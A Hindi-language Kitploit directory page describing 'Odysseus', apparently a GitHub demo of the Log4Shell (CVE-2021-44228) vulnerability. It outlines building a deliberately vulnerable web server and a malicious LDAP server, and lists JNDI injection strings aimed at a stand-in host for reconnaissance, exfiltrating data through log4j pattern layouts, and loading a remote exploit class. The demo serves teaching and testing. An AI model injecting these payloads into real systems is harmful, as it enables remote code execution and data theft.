Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Odysseus — Log4Shell (CVE-2021-44228) भेद्यता का एक डेमो। | Kitploit
उपकरण/GitHubGitHub/roshanshibu/odysseus
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोललर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubroshanshibu/odysseus

Odysseus

Log4Shell (CVE-2021-44228) भेद्यता का एक डेमो।

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Odysseus

Log4Shell (CVE-2021-44228) भेद्यता का एक डेमो।

बिल्ड निर्देश

कमजोर वेबसर्वर और दुर्भावनापूर्ण LDAP सर्वर दोनों को JDK 1.8.0_181 पर बनाया और परीक्षण किया गया था।

अच्छे लोगों का वेब सर्वर

  1. goodguys के अंदर, gradlew bootJar चलाएँ
  2. java -jar build/libs/goodguys-0.0.1-SNAPSHOT.jar का उपयोग करके कमजोर वेबसर्वर चलाएँ

बुरे लोगों का LDAP/वेब सर्वर

  1. badguys के अंदर, mvn package चलाएँ
  2. java -jar .\target\evil-server.jar का उपयोग करके दुष्ट सर्वर चलाएँ

नोट: Windows Defender चुपचाप target\classes\Exploit.class को क्वारंटाइन में भेज सकता है।

दुष्ट पेलोड

दुर्भावनापूर्ण कमांड Exploit.java के अंदर परिभाषित हैं।

इंजेक्शन ट्रिगर

इनपुटटिप्पणियाँ
${jndi:ldap://evil-server-hostname:389/Recon}LDAP सर्वर पर कनेक्शन अनुरोध को सुनकर जाँचता है कि लक्ष्य कमजोर है या नहीं।
${jndi:ldap://evil-server-hostname:389/Recon [log4j Pattern Layout(s)]लक्ष्य से डेटा एकत्र करने और हमलावर के टर्मिनल में प्रदर्शित करने के लिए कोई भी मान्य log4j पैटर्न लेआउट जोड़ें।
${jndi:ldap://evil-server-hostname:389/Exploit}

संदर्भ

https://securityboulevard.com/2019/01/exploiting-jndi-injections-in-java/ https://logging.apache.org/log4j/1.2/apidocs/org/apache/log4j/PatternLayout.html
https://www.ibm.com/blog/how-to-detect-patch-log4j-vulnerability/

टूल डाउनलोड करें
पेलोड चलाएँ।